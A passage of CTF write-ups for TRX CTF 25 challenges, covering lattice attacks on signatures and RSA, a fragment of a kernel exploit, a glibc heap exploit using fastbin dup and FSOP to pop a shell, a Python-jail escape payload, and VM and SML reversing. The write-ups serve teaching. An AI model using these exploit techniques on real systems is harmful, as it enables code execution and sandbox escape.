		:
	);

	ioctl(fd, MSR_KERNEL_GS_BASE, KERNEL_GS);

	naked_syscall();
	*kbase =  *(ul*) &fake_stack[0xf50] -  0x120012f;

	while (1)
		naked_syscall();

	stop("finished");
	return  0;
}

TRX CTF 25 - babyDLP

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

This challenge has two main parts:

Recovering d (straightforward)
Recovering the flag (a bit more challenging)

Recovering `d`

This is a classic biased-nonce attack, which can be solved using LLL.

We are given the equations:

$$ R = (k_1 + k_2) \cdot G $$$$ s = \frac{h \cdot k_2 + d \cdot R.x}{k_1} $$

where k1 and k2 are two 32-bit random values. Each time we make a signing query, we get the equation:

$$ s \cdot k_1 = h \cdot k_2 + d \cdot R.x $$

Here, k1 and k2 are the unknowns, and d is the secret key we want to extract.

Since both k1 and k2 are small (32-bit), we can solve this as a system of linear equations with small unknowns using LLL.

For details on this I’ve written a blog post here: https://magicfrank00.github.io/writeups/posts/lll-to-solve-linear-equations/

Recovering the Flag

At this point, we are given $ \text{flag} \mod \text{order}$

The issue is that the flag is around 350 bits, while the order is only 195 bits. Brute-forcing the missing 150 bits isn’t feasible.

After writing this challenge, I realized there’s an extremely similar challenge by Neobeo. Instead of re-explaining the solution, I’ll just link his excellent writeup here:

https://web.archive.org/web/20240412075022/https://demo.hedgedoc.org/s/DnzmwnCd7

Overview on our solution

We can represent the flag as a sum of its character values multiplied by powers of 256:

$$ c_0 \cdot 256^{43} + c_1 \cdot 256^{42} + \dots + c_{42} \cdot 256 + c_{43} $$

where each $c_i$ corresponds to a character in the flag.

We’re given this equation, but with an extra modulus term, so we end up with:

$$ c_0 \cdot 256^{43} + c_1 \cdot 256^{42} + \dots + c_{42} \cdot 256 + c_{43} = m + k \cdot p $$

where:

$m$ is the value we are given.
$p$ is the order of the curve (modulus).
$c_i$ are the characters of the flag.

We can apply a few tricks to reduce the size of the unknowns and then solve with LLL:

We know the flag format starts with TRX{, so we can simply subtract this known prefix from the equation. (same for })
We know the remaining flag characters are mostly lowercase ASCII letters, meaning each $c_i$ is close to the average lowercase ASCII value (≈106). So we rewrite the equation as:
$$ (c_0 + 106) \cdot 256^{43} + (c_1 + 106) \cdot 256^{42} + \dots + (c_{42} + 106) \cdot 256 + (c_{43} + 106) = m + k \cdot p $$
Now, each unknown $c_i$ is very close to 0 (within about ±15), which makes LLL effective.
Brute-forcing for more precision: If we brute-force just the first unknown character, we reduce the problem complexity by another 5 bits, making the solution even more precise.

TRX CTF 25 - Brainrot

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

We’re given three equations and need to recover a flag, which we can split into five parts:

$$ f_0, f_1, f_2, f_3, f_4 $$

These equations represent the evaluation of a polynomial at specific points. The unknowns (the flag parts) are the coefficients of this polynomial. The given values are just different points where the polynomial has been evaluated:

$$ P(x) = \sum_{i=0}^{4} \mathrm{rot}_{8000}(f_i) \cdot x^i $$

We also have two modulus values that play a role in how the results are structured:

$$ m_1 = \text{b2l}(b'\text{cant_give_you_everything}') $$$$ m_2 = \text{b2l}(b'\text{only_half!!!}') $$

The Given Equations

The challenge gives us three polynomial evaluations, but with a double modulo operation applied. First, the result is reduced modulo $m_1$, and then that result is further reduced modulo $m_2$:

$$ \begin{aligned} P(0x\text{deadbeef}) \mod m_1 \mod m_2 &= r_1 \\ P(13371337) \mod m_1 \mod m_2 &= r_2 \\ P(0x\text{cafebabe}) \mod m_1 \mod m_2 &= r_3 \end{aligned} $$

$\mathrm{rot}_{8000}$

The function $\mathrm{rot}_{8000}$ applies a specific transformation that encodes each flag part using UTF-16. It can be expressed as:

$$ \mathrm{rot}_{8000}(\text{'FLAG'}).encode('utf-16') = 0xfffe0000000000000000 + \sum_{i=0}^{3} ((0x40 + \text{FLAG}[i]) \times 256 + 0x1f) \times 256^{2(3-i)} $$

(This can be recovered just by playing with this function a bit)

Working Around the Moduli

To simplify things, we introduce two helper variables $k_1$ and $k_2$:

$$ \text{eq} - k_1 \cdot m_1 - k_2 \cdot m_2 = \text{res} $$

Since $k_2$ is roughly $m_1 / m_2$, we end up with a system of three equations where the solutions are small and bounded.

Solving with LLL

At this point, solving the equations comes down to finding small solutions to a linear system. This is exactly what LLL is good for.

A great explanation of how to use LLL for problems like this can be found here: https://magicfrank00.github.io/writeups/posts/lll-to-solve-linear-equations/

TRX CTF 25 - factor.com

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

This challenge is similar to standard RSA, except that the modulus $N$ is a product of multiple primes, some of which can be very small.

Exploiting the Structure

Instead of waiting for all primes to be small (which could take an impractical amount of time), we can extract small pieces of information at a time by factoring parts of $N$.

If we manage to extract even one small prime factor $q$ of $N$, we can immediately start recovering the flag:

Breaking It Down

We are given the standard RSA equation:

$$ \text{flag}^e \mod N = c $$

If we find a small prime $q$ that divides $N$, we can reduce the equation modulo $q$:

$$ c \mod q = (\text{flag}^e \mod N) \mod q = \text{flag}^e \mod q $$

Since $e$ is known, we can compute the $e$-th root modulo $q$ to recover:

$$ \text{flag} \mod q $$

Reconstructing the Full Flag

By repeating this process for multiple small prime factors, we collect a system of modular equations:

$$ \text{flag} \mod q_1, \quad \text{flag} \mod q_2, \quad \dots, \quad \text{flag} \mod q_n $$

Finally, using the Chinese Remainder Theorem (CRT), we reconstruct the original flag.

TRX CTF 25 - factordb.com

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

Disclaimer: It’s magicfrank speaking at 20 Feb 00:57 2025. I really hope nobody actually uploads the factorization to factordb.com, but let’s see.

Understanding the Leak

This challenge is a standard RSA with a leak where we have to factorize the modulus.

The function generating the leak is particularly bad because each bit of leak_i only depends on the lower (least significant) bits of $p$ and $q$.

This means:

$\text{LEAK} \mod 2$ only depends on $p \mod 2$ and $q \mod 2$.
$\text{LEAK} \mod 2^2$ depends only on $p \mod 4$, $q \mod 4$.
$\text{LEAK} \mod 2^3$ depends only on $p \mod 8$, $q \mod 8$.

Since each step only depends on previously discovered bits, we can reconstruct $p$ and $q$ one bit at a time by trying all possible values and checking against both $N$ and the leak.

Recovering the Factors

We recover $p$ and $q$ bit by bit using brute-force with constraints. We start with the least significant bit (LSB) and systematically build up to the full values.

Step-by-Step Example

Finding the first bit
- Since $N \mod 2 = 1$, we know that both $p$ and $q$ must be 1.
- The possible values for $(p \mod 2, q \mod 2)$ are:
  - (0,0) → 0 × 0 = 0 (incorrect)
  - (0,1) → 0 × 1 = 0 (incorrect)
  - (1,0) → 1 × 0 = 0 (incorrect)
  - (1,1) → 1 × 1 = 1 (correct ✅)
So the only valid choice is (1,1).
Finding the second bit
- Now, we try all possibilities for the second-least significant bit, while keeping the first bit fixed.
- Possible values:
  - (1,1)
  - (1,3)
  - (3,1)
  - (3,3)
- We check which of these satisfy both:
  - $N \mod 4$
  - $\text{LEAK} \mod 4$
- In this case N%4 = 1
  - (1,1) → 1 × 1 = 1 (correct ✅)
  - (1,3) → 1 × 3 = 3 (incorrect)
  - (3,1) → 3 × 1 = 3 (incorrect)
  - (3,3) → 3 × 3 = 1 (correct ✅)
- We have two valid choices: (1,1) and (3,3), so let’s check the leak function
- LEAK%4 = 2
  - (1,1) → (0x1337 + 1 + 1) ^ (0x1337 * 1 * 1) & (1 | 0x1337137) = 2 (correct ✅)
  - (3,3) → (0x1337 + 3 + 3) ^ (0x1337 * 3 * 3) & (3 | 0x1337137) = 2 (correct ✅)
- Both are valid, so we can continue with both.
Finding the third bit
- Now partial p and q could be either (1,1) or (3,3)
- Possible values:
  - (1,1)
  - (1,5)
  - (5,1)
  - (5,5)
  - (3,3)
  - (3,7)
  - (7,3)
  - (7,7)
- Check on N%8=5
  - (1,1) → 1 × 1 = 1 (incorrect)
  - (1,5) → 1 × 5 = 5 (correct ✅)
  - (5,1) → 5 × 1 = 5 (correct ✅)
  - (5,5) → 5 × 5 = 1 (incorrect)
  - (3,3) → 3 × 3 = 4 (incorrect)
  - (3,7) → 3 × 7 = 5 (correct ✅)
  - (7,3) → 7 × 3 = 5 (correct ✅)
  - (7,7) → 7 × 7 = 1 (incorrect)
- Check on LEAK%8=2
  - (1,5) → (0x1337 + 1 + 5) ^ (0x1337 * 1 * 5) & (1 | 0x1337137) = 6 (incorrect)
  - (5,1) → (0x1337 + 5 + 1) ^ (0x1337 * 5 * 1) & (5 | 0x1337137) = 6 (incorrect)
  - (3,7) → (0x1337 + 3 + 7) ^ (0x1337 * 3 * 7) & (3 | 0x1337137) = 2 (correct ✅)
  - (7,3) → (0x1337 + 7 + 3) ^ (0x1337 * 7 * 3) & (7 | 0x1337137) = 2 (correct ✅)
- We have two valid choices: (1,5) and (3,7)
  - Note that the leak in this case actually helped us by eliminating half of the possibilities!
Finding the fourth bit
- …

…. …

BFS Implementation

We won’t do it by hand (it’s certainly possible, but humans invented computers for a reason).

from collections import deque

def bfs(n, leak):
    start = (0, 0, 1)  # (p_guess, q_guess, bit_position)
    queue = deque([start])
    ccc = 0

    while queue:
        pk, qk, k = queue.popleft()
        ccc += 1
        if ccc % 100 == 0:
            print(f"\r{k}", end='')

        if pk * qk > n:
            continue
        if pk * qk == n:
            print("FOUND", pk, qk)
            return pk, qk

        # Try all possible combinations of the next bit
        poss = [(0,0), (0,2**(k-1)), (2**(k-1),0), (2**(k-1),2**(k-1))]
        for pos in poss:
            new_pk, new_qk = pk + pos[0], qk + pos[1]
            if (F(new_pk, new_qk) % 2**k == leak % 2**k and
                (new_pk * new_qk) % 2**k == n % 2**k):
                queue.append((new_pk, new_qk, k+1))

TRX CTF 25 - Free the monsters

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

The challenge’s structure is wrapped in a quest embarking game, the player is required to select some quest from the quest list change his equipment and embark, at any given moment during the preparation it can also check it’s statistics.

Playing around with the binary already reveals some vulnerabilities:

What do you want to do?
1. Equip weapon
2. Unequip weapon
> 1
Enter weapon name: hammer
Enter weapon attack: 10
Enter weapon defense: 10
1. Check player status
2. Select a quest
3. Embark on a quest
4. Change equipment
5. Exit
> 4
Select equipment to change:
1. Helmet
2. Chest
3. Gloves
4. Waist
5. Legs
6. Weapon
7. Jewel
8. Earing
9. Charm
10. Talisman
11. Kinsect
12. Palico
13. Palamute
> 6
What do you want to do?
1. Equip weapon
2. Unequip weapon
> 2
1. Check player status
2. Select a quest
3. Embark on a quest
4. Change equipment
5. Exit
> 1
Name: Lorenzinco
Level: 1
Weapon: hammer

Attack: 24881791099
Defense: 10668836035454024818
====================================
1. Check player status
2. Select a quest
3. Embark on a quest
4. Change equipment
5. Exit
>

All of the pointers inside the player’s profile do not get set to NULL when freed. Given the heap blocks structure, in which the next pointer gets stored in the data section of the current chunk (click here to find more details about this), this gives already the ability to leak some heap addresses.

In the same part of the code we can also see that the code does not check whether that pointer was freed already before freeing it, this means we also got a double free to play around.

When allocating the chunks we also get to decide that to write in them, since the binary asks for the user to send the name, the attack and the defense of each equipment, conviniently stored inside the chunk.

Now, here comes the first problem: the chunk size. Each chunk is only 0x30 bytes wide. This means that if fill the tcache bins it fill fit right into the fast bin, not inside the unsorted one, which is where we want it to be.

To make a chunk fit into the unsorted bin we must therefore find a way to modify its size, this can be achieved by fast-bin duping, which is filling tcache, double freeing a chunk into a fastbin and change the next address to hit a chunk’s metadata, by writing on it we’re able to change the size of the chunk itself.

Keep in mind that due to the checks that get done when freeing, prev_size should be valid as well as prev_inuse flag which needs to be set to 1.

The libc version is 2.41 therefore each heap pointer is encoded ( same for all libcs past 2.35 ).

#FAKE AN UNSORTED BIN CHUNK TO LEAK LIBC
for i in range(1, 14):
    equip(i, p64(heap>>12)*4, heap>>12, 0)
for i in range(3, 10):
    unequip(i)
unequip(10)
unequip(11)
unequip(10)

for i in range(7):
    equip(3, b"A", 0, 0)
equip(3, b"A", (heap>>12)^(heap+0x2c0), 0)
for i in range(3):
    equip(3, p64(0)+p64(0x441), 0, 0)
for i in range(6):
    equip(3, b"B", 0, 0)

unequip(2)
view()
r.recvuntil(b"Attack: ")
r.recvuntil(b"Attack: ")
libc.address = int(r.recvline()) - 0x211b20 # MAIN ARENA
log.info(hex(libc.address))

Having retrieved the libc base address now we can take two intended paths:

The angry FS-Rop cool as fuck road
The boring and lame environ and onegadget path

Note: The environ leak requires to be expecially carefull with the pointers inside the heap, when duping a chunk and modifying its next we might break the tcache, preventing us to from doing it again.

That said, i chose to writeup the cool as fuck road which involves writing a fake file pointer on the heap and then overwriting that pointer into __std_err (or whatever file pointer, stderr is handy since is not used in the context of this binary).

If you have no idea what this means i highly encourage you to read this, it contains far more precise and useful information about fs exploits than what I could ever sum up in this writeup.

As said, we are going to overwrite std_err:

#OVERWRITE STDERR->CHAIN
for i in range(1, 12):
    equip(i, p64(heap>>12)*4, 0, 0)

for i in range(3, 10):
    unequip(i)
unequip(10)
unequip(11)
unequip(10)

for i in range(7):
    equip(3, b"\0", 0,0)

equip(3, b"A", (heap>>12)^(libc.sym._IO_2_1_stderr_+0x60), 0)
for i in range(3):
    equip(3, p8(3), 0, heap+0x7a0) # heap pointer to our custom file struct

for i in range(7):
    equip(3, b"\0", 0,0)

and write a file struct containing the vtable pointer modified, pwntools has this fancy function to do this automatically called fsrop() so we don’t have to go through the hassle of filling the vtable offsets ourself, it’s like a one gadget.

#WRITE FAKE FP ON THE HEAP
payload = fsrop(heap+0x7a0)+b"\0"*0x200
# redistribute payload among fields
for i in range(7):
    equip(3, payload[16:16+0x20], u64(payload[:8]), u64(payload[8:16]))
    payload = payload[16+0x30:]

Note: this payload gets truncated each time a chunk metadata appears on the heap, so some fields of the file struct are goin to be broken and filled with garbage. They are not essential at all so we want to start writing the struct from an offset from which the important part (vtable pointer) is not overwritten with garbage, that is 0x10.

Done! All there’s left to do is to trigger _IO_flush_all by exiting the binary and we popped a shell!

TRX{wh0_th3_fuck_kn0w5_4b0u7_f457B1n5?!_153CA0}

TRX CTF 25 - Golf

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

Overview

We’re given a file named chall.py, let’s take a look at its content

#!/usr/bin/env python3.13
if(c:=input()).isascii()*~-any(x in(c)for(x)in'!"#\'()*+-:<>@[]\\_{}'):exec(c[:43])

This is obviously a pyjail, and our goal is to read the flag from a file. First, let’s rewrite this code in a more understandable way:

#!/usr/bin/env python3.13

code = input()

if code.isascii() and not any(x in code for x in '!"#\'()*+-:<>@[]\\_{}'):
    exec(code[:43])

So that means we can only use the following characters ?.,|^/`;=&~$%. Fortunately for us, built-in functions are not erased, so we can still import modules and execute certain operations.

Main Idea

The payload must be extremely short. Spawning a shell with so few characters is a challenging task, especially since we cannot directly call functions. To bypass this restriction, we can search for gadgets inside Python that will be triggered when an exception occurs.

The shortest way to trigger an exception is by referencing an undefined variable:

>>> x
Traceback (most recent call last):
  File "", line 1, in 
    x
NameError: name 'x' is not defined

Now we can try to overwrite some builtins to see if they’re being called before throwing the exception. Our goal is to find a function that is invoked with no arguments so that we can overwrite it with breakpoint. A good candidate is set. Let’s try overwriting it:

import builtins;builtins.set = breakpoint;a

# Output:
  File "/slop.py", line 1, in 
    import builtins;builtins.set = breakpoint;a
NameError: name 'a' is not defined

This is strange. We know that breakpoint is being called because if we overwrite set with print, we can observe values and newlines being printed.

The breakpoint function imports the pdb module, which will import other modules. To prevent set from being called before we intend it to, we must first import pdb.

Final payload

import pdb,builtins;builtins.set = breakpoint;a

This payload is still too long, so we have to shorten it:

import pdb,builtins as e;e.set=breakpoint;a

This successfully breaks out of the jail and allows us to get the flag.

TRX CTF 25 - Indianess

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

Challenge Description

Like a timeless classic in literature, this challenge embodies the essence of its genre. A true staple of CTFs, it tests fundamental skills with a familiar yet ever-engaging twist. Seasoned players will recognize its form

Static Analysis

We can start with a few observations, the challenge attachments contains an executable called vm and a binary file called bytecode.bin, as we can guess, this will most likely be a vm challenge, so we can start reversing.

Opening the vm executable in IDA reveals a stripped C++ binary. The main function takes two arguments: the bytecode file and a flag string. The function sub_6B67 loads the bytecode file and passes its contents to sub_2589, which implements the core of the virtual machine.

Understanding the Virtual Machine

Through analysis, we determine that the VM operates on an array, likely used as registers. It supports standard operations such as ADD, SUB, MOV, with multiple operand types like REG2REG, MEM2MEM, and MEM2REG. The last instruction in the bytecode prints output based on the correctness of the flag. Lastly we can notice that the flag len is checked to be 30.

Writing a Disassembler

Analyzing the instruction set, we determine the following opcode mappings:

ADD = 0
SUB = 1
MUL = 2
DIV = 3
MOD = 4
NOT = 5
OR = 6
AND = 7
XOR = 8
MOV = 9
ASSERT = 10
PRINT = 11

REG_REG = 0
MEM_IMM_MEM_IMM = 1
MEM_IMM_MEM_REG = 2
MEM_REG_MEM_IMM = 3
MEM_REG_MEM_REG = 4
REG_IMM = 5
REG_MEM_IMM = 6
REG_MEM_REG = 7
MEM_IMM_IMM = 8
MEM_REG_IMM = 9
MEM_IMM_REG = 10
MEM_REG_REG = 11
REG_PLAIN = 12

Now we implement the disassebler knowing the codes. First, we can start by loading the code file:

file = 'bytecode.bin'
with open(file, 'rb') as f:
	code = f.read()

Then we can write an helper function that gives combine the instruction with the mode:

def parse_code(op: str, mode: int, op1: int, op2: int):
	if mode == REG_IMM or mode == REG_PLAIN:
		print(f'{op} r{op1}, {op2}')
	elif mode == MEM_IMM_IMM:
		print(f'{op} mem[{op1}], {op2}')
	elif mode == REG_MEM_IMM:
		print(f'{op} r{op1}, mem[{op2}]')
	elif mode == REG_REG:
		print(f'{op} r{op1}, r{op2}')
	elif mode == MEM_IMM_MEM_REG:
		print(f'{op} mem[{op1}], mem[r{op2}]')
	elif mode == MEM_REG_REG:
		print(f'{op} mem[r{op1}], r{op2}')
	elif mode == REG_MEM_REG:
		print(f'{op} r{op1}, mem[r{op2}]')
	elif mode == MEM_REG_MEM_REG:
		print(f'{op} mem[r{op1}], mem[r{op2}]')
	else:
		print(f'Unknown mode for {op}: {mode}')
		exit(1)

now we can run the program an write only the neede instructions in a loop that reads all the instructions:

i = 0
while i < len(code):
	op = code[i]
	if op == PRINT:
		print('print')
		i += 1
		continue
	mode = code[i+1]
	if op == MOV:
		parse_code('mov', mode, code[i+2], code[i+3])
	elif op == ADD:
		parse_code('add', mode, code[i+2], code[i+3])
	elif op == XOR:
		parse_code('xor', mode, code[i+2], code[i+3])
	elif op == ASSERT:
		parse_code('assert', mode, code[i+2], code[i+3])
	else:
		print(f'Unknown op: {op}')
		exit(1)
	i += 4

Final Disassembler

file = 'bytecode.bin'
with open(file, 'rb') as f:
	code = f.read()

ADD = 0
SUB = 1
MUL = 2
DIV = 3
MOD = 4
NOT = 5
OR = 6
AND = 7
XOR = 8
MOV = 9
ASSERT = 10
PRINT = 11

REG_REG = 0
MEM_IMM_MEM_IMM = 1
MEM_IMM_MEM_REG = 2
MEM_REG_MEM_IMM = 3
MEM_REG_MEM_REG = 4
REG_IMM = 5
REG_MEM_IMM = 6
REG_MEM_REG = 7
MEM_IMM_IMM = 8
MEM_REG_IMM = 9
MEM_IMM_REG = 10
MEM_REG_REG = 11
REG_PLAIN = 12


def parse_code(op: str, mode: int, op1: int, op2: int):
	if mode == REG_IMM or mode == REG_PLAIN:
		print(f'{op} r{op1}, {op2}')
	elif mode == MEM_IMM_IMM:
		print(f'{op} mem[{op1}], {op2}')
	elif mode == REG_MEM_IMM:
		print(f'{op} r{op1}, mem[{op2}]')
	elif mode == REG_REG:
		print(f'{op} r{op1}, r{op2}')
	elif mode == MEM_IMM_MEM_REG:
		print(f'{op} mem[{op1}], mem[r{op2}]')
	elif mode == MEM_REG_REG:
		print(f'{op} mem[r{op1}], r{op2}')
	elif mode == REG_MEM_REG:
		print(f'{op} r{op1}, mem[r{op2}]')
	elif mode == MEM_REG_MEM_REG:
		print(f'{op} mem[r{op1}], mem[r{op2}]')
	else:
		print(f'Unknown mode for {op}: {mode}')
		exit(1)

i = 0
while i < len(code):
	op = code[i]
	if op == PRINT:
		print('print')
		i += 1
		continue
	mode = code[i+1]
	if op == MOV:
		parse_code('mov', mode, code[i+2], code[i+3])
	elif op == ADD:
		parse_code('add', mode, code[i+2], code[i+3])
	elif op == XOR:
		parse_code('xor', mode, code[i+2], code[i+3])
	elif op == ASSERT:
		parse_code('assert', mode, code[i+2], code[i+3])
	else:
		print(f'Unknown op: {op}')
		exit(1)
	i += 4

Bytecode Analysis

At first we can notice something strange, the bytecode is only using 5 different instructions. We can inspect the disassembled code to get an idea of what is doing.

If we filter for the assert like operation we notice that there are only 30 of them, exactly as the flag len. And if we filter for the print operation that checks if we have the correct flag, we see that there is only one at the end of the bytecode.

Now we can look at first operations of the bytecode, and we can see are a lor of initializazion of the memory like:

mov r0, 0
mov mem[0], 0
mov mem[1], 1
mov mem[2], 2
mov mem[3], 3
mov mem[4], 4
mov mem[5], 5
mov mem[6], 6
mov mem[7], 7
mov mem[8], 8
mov mem[9], 9
mov mem[10], 10
mov mem[11], 11
mov mem[12], 12
mov mem[13], 13
...

This is very strange, also after the initialization we are greeted with another strange combination of instructions like:

mov r1, mem[0]
add r1, 93
add r1, r0
mov r0, r1
mov r2, mem[0]
mov mem[0], mem[r0]
mov mem[r0], r2
...

That is repeated with a different value and offset. if we filter by “add r1, " and remove the ones with r0, We see that the hardcoded values repeats themselves after 16 bytes, and if we filter for “mov r1, mem” to see how far it goes we see that it goes until 255. This can be unrolled to the following code:

r0 = 0
mem = [0] * 256
for i in range(256):
	mem[i] = i
hardcoded = [...]
for i in range(256):
	r0 += mem[i] + hardcoded[i % 16]
	mem[i], mem[r0] = mem[r0], mem[i] # swap

After a quick look we recognize the initialization frunction of RC4!

After this realization we can extract with the disassembler the hardcoded values in the movs and in the asserts

elif op == ADD:
	if mode == REG_IMM or mode == REG_PLAIN:
		if len(key) < 16:
			key.append(code[i+3])
	parse_code('add', mode, code[i+2], code[i+3])

elif op == ASSERT:
	parse_code('assert', mode, code[i+2], code[i+3])
	ciphertext.append(code[i+3])

Now for the final step, decrypt the ciphertext:

from Crypto.Cipher import ARC4
cipher = ARC4.new(key=bytes(key))
flag = cipher.decrypt(bytes(ciphertext))
print(flag.decode())

Final Solve Script

file = 'bytecode.bin'
with open(file, 'rb') as f:
	code = f.read()

ADD = 0
SUB = 1
MUL = 2
DIV = 3
MOD = 4
NOT = 5
OR = 6
AND = 7
XOR = 8
MOV = 9
ASSERT = 10
PRINT = 11

REG_REG = 0
MEM_IMM_MEM_IMM = 1
MEM_IMM_MEM_REG = 2
MEM_REG_MEM_IMM = 3
MEM_REG_MEM_REG = 4
REG_IMM = 5
REG_MEM_IMM = 6
REG_MEM_REG = 7
MEM_IMM_IMM = 8
MEM_REG_IMM = 9
MEM_IMM_REG = 10
MEM_REG_REG = 11
REG_PLAIN = 12


DEBUG = False


def parse_code(op: str, mode: int, op1: int, op2: int):
	if not DEBUG:
		return
	if mode == REG_IMM or mode == REG_PLAIN:
		print(f'{op} r{op1}, {op2}')
	elif mode == MEM_IMM_IMM:
		print(f'{op} mem[{op1}], {op2}')
	elif mode == REG_MEM_IMM:
		print(f'{op} r{op1}, mem[{op2}]')
	elif mode == REG_REG:
		print(f'{op} r{op1}, r{op2}')
	elif mode == MEM_IMM_MEM_REG:
		print(f'{op} mem[{op1}], mem[r{op2}]')
	elif mode == MEM_REG_REG:
		print(f'{op} mem[r{op1}], r{op2}')
	elif mode == REG_MEM_REG:
		print(f'{op} r{op1}, mem[r{op2}]')
	elif mode == MEM_REG_MEM_REG:
		print(f'{op} mem[r{op1}], mem[r{op2}]')
	else:
		print(f'Unknown mode for {op}: {mode}')
		exit(1)


ciphertext = []
key = []

i = 0
while i < len(code):
	op = code[i]
	if op == PRINT:
		if DEBUG:
			print('print')
		i += 1
		continue
	mode = code[i+1]
	if op == MOV:
		parse_code('mov', mode, code[i+2], code[i+3])
	elif op == ADD:
		if mode == REG_IMM or mode == REG_PLAIN:
			if len(key) < 16:
				key.append(code[i+3])
		parse_code('add', mode, code[i+2], code[i+3])
	elif op == XOR:
		parse_code('xor', mode, code[i+2], code[i+3])
	elif op == ASSERT:
		parse_code('assert', mode, code[i+2], code[i+3])
		ciphertext.append(code[i+3])
	else:
		print(f'Unknown op: {op}')
		exit(1)
	i += 4


print('key:', key)
print('ciphertext:', ciphertext)

from Crypto.Cipher import ARC4
cipher = ARC4.new(key=bytes(key))
flag = cipher.decrypt(bytes(ciphertext))
print(flag.decode())

Flag

TRX{RC4_1s_4_r3al_m4st3rp13c3}

TRX CTF 25 - LLL

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

Description

LLL is my favourite programming lan… Cryptographic algorithm

First Steps

As we open the source file we can see that everything is obfuscated by changing the name of everything. The simplest thing we can do, is run the code (give that is sml). As we run the code (with use "LLL.sml"; into the sml console) we see that loads the program and then it stops, we can try to give test as input, but it fails with a Flag length mismatch exception.

Now we can try to find the length of the flag and where all of this happens; at line 178 we can find where the input is taken:

val l = Option.getOpt (TextIO.inputLine TextIO.stdIn, "NONE\n");

This is used as argument to the function at line 141, where it compares the length of the input with 29, we can now start to recover some names, like flag and flag_len.

After running with a string of the correct length (28, because the 29th is the newline), we see a variable that holds an list of tuples of string and a number, where the strings are “l” times their index+1 and the number is the ascii representation of the equivalent character. so we can deobfuscate thi function in something like this:

fun repeat_string(n: int): string =
	if n <= 0 then ""
	else "l" ^ repeat_string (n - 1)


fun init(flag: string) =
	let
		val len = String.size flag
	in
		if len = flag_len then
			let
				val arr = Array.array (flag_len + 1, ("", 0))
				fun fillArray i =
					if i < flag_len then
						(Array.update (arr, i, ((repeat_string (i+1)), Char.ord (String.sub (flag, i))));
						 fillArray (i + 1))
					else if i = flag_len then
						(Array.update (arr, i, ("llllllllllllllllllllllllllllll", 1));
						 fillArray (i + 1))
					else
						arr
				fun arrayToList arr = Array.foldr (op ::) [] arr
			in
				arrayToList (fillArray 0)
			end
		else
			raise Fail "Flag length mismatch"
	end;

Now in the function the last thing remaining that is not that obvious, is llllllllllllllllllllllllllllll, that we can find in the function below that is called at the end of the program, So we can rename th unkown string as correct because of the print in the function, and after looking into the other called function we can end up with something like:

fun check(result:(string * int) list) =
	let
		val correct = findElementByKey("correct", result)
	in
		if correct = 1 then
			print "Correct!\n"
		else
			print "Skill Issue!\n"
	end;

exception NotFoundException;
fun findElementByKey(key: string, lst: (string * int) list): int =
	case lst of
		[] => raise NotFoundException
		| (k,v) :: rest =>
			if k = key then
				v
			else
				findElementByKey(key, rest);

Type Deobfuscation

We observe that the type (string * int) list is used throughout the program, suggesting that it serves as some sort of context or environment. To simplify our analysis, we can assign generic names to various types for now, such as type_1, type_2, and for subtypes, type_1_1, type_1_2, etc. Following this approach, we define the type structures accordingly.

datatype type_1 = type_1_1 of int | type_1_2 of string | type_1_3 of type_1 * type_1 | type_1_4 of type_1 * type_1 | type_1_5 of type_1 * type_1 | type_1_6 of type_1 * type_1;
datatype type_2 = type_2_1 | type_2_2 | type_2_3 of type_2 * type_2 | type_2_4 of type_2 * type_2 | type_2_5 of type_2 | type_2_6 of type_1 * type_1 | type_2_7 of type_1 * type_1 | type_2_8 of type_1 * type_1;
datatype type_3 = type_3_1 | type_3_2 of type_3 * type_3 | type_3_3 of string * type_1 | type_3_4 of type_2 * type_3 * type_3 | type_3_5 of type_2 * type_3 | type_3_6 | type_3_7 of type_3;
datatype type_4 = type_4_1 | type_4_2 of type_3 * type_4;

Upon closer examination of the functions, we notice that the first function operates on a type_1 variable and includes cases for all its variants, similar to a tagged enum in other languages. Likewise, the second function follows the same pattern for type_2, and so forth.

We can now attempt to deobfuscate these functions further.

Looking at the first function, we see that type_1_1 simply unpacks its value, which must be an int (as inferred from the function’s type). Most of the other subtypes recursively call the function while performing mathematical operations. The exception is type_1_2, which, given a string, retrieves its corresponding value from the environment.

This suggests that type_1 represents an expression type, encompassing constants, mathematical operations, and variables (similar to objects). We can rename all related elements accordingly.

datatype Exp = Const of int | Var of string | Sum of Exp * Exp | Sub of Exp * Exp | Mul of Exp * Exp | Div of Exp * Exp;

fun evalExp(E:(string * int) list, ll:Exp):int =
	case ll of
		Const v => v
		| Var v => findElementByKey(v, E)
		| Sum (v1, v2) => evalExp(E, v1) + evalExp(E, v2)
		| Sub (v1, v2) => evalExp(E, v1) - evalExp(E, v2)
		| Mul (v1, v2) => evalExp(E, v1) * evalExp(E, v2)
		| Div (v1, v2) => evalExp(E, v1) div evalExp(E, v2);

For the second function, we can apply a similar approach and determine that it operates on boolean values.

datatype Bool = True | False | And of Bool * Bool | Or of Bool * Bool | Not of Bool | Eq of Exp * Exp | Gt of Exp * Exp | Lt of Exp * Exp;

fun evalBool(E:(string * int) list, ll:Bool):bool =
	case ll of
		True => true
		| False => false
		| And (lll,llll) => evalBool(E, lll) andalso evalBool(E, llll)
		| Or (lll,llll) => evalBool(E, lll) orelse evalBool(E, llll)
		| Not lll => not(evalBool(E, lll))
		| Eq (lll,llll) => evalExp(E, lll) = evalExp(E, llll)
		| Gt (lll,llll) => evalExp(E, lll) > evalExp(E, llll)
		| Lt (lll,llll) => evalExp(E, lll) < evalExp(E, llll);

The third function is more complex, as its return type is the environment itself. Considering that it modifies the environment, we can reasonably assume that type_3 represents instructions.

Now, we analyze these instructions:

The first case is a nop/skip operation since it does nothing and returns the environment unchanged.
The second case evaluates two expressions sequentially, where the first function call updates the environment before the second function call operates on it. This suggests a sequence operation.
The third case evaluates the first value, then inserts it at the beginning of the environment, making it similar to an assignment.
The next case resembles an if statement, as indicated by its structure.
The following case is trickier: it evaluates a boolean expression, and if the result is false, it returns immediately; otherwise, it evaluates a sequence of statements before recursively executing itself. This clearly represents a while loop.

fun evalProgram(E:(string * int) list, ll:Program):((string * int) list) =
	case ll of
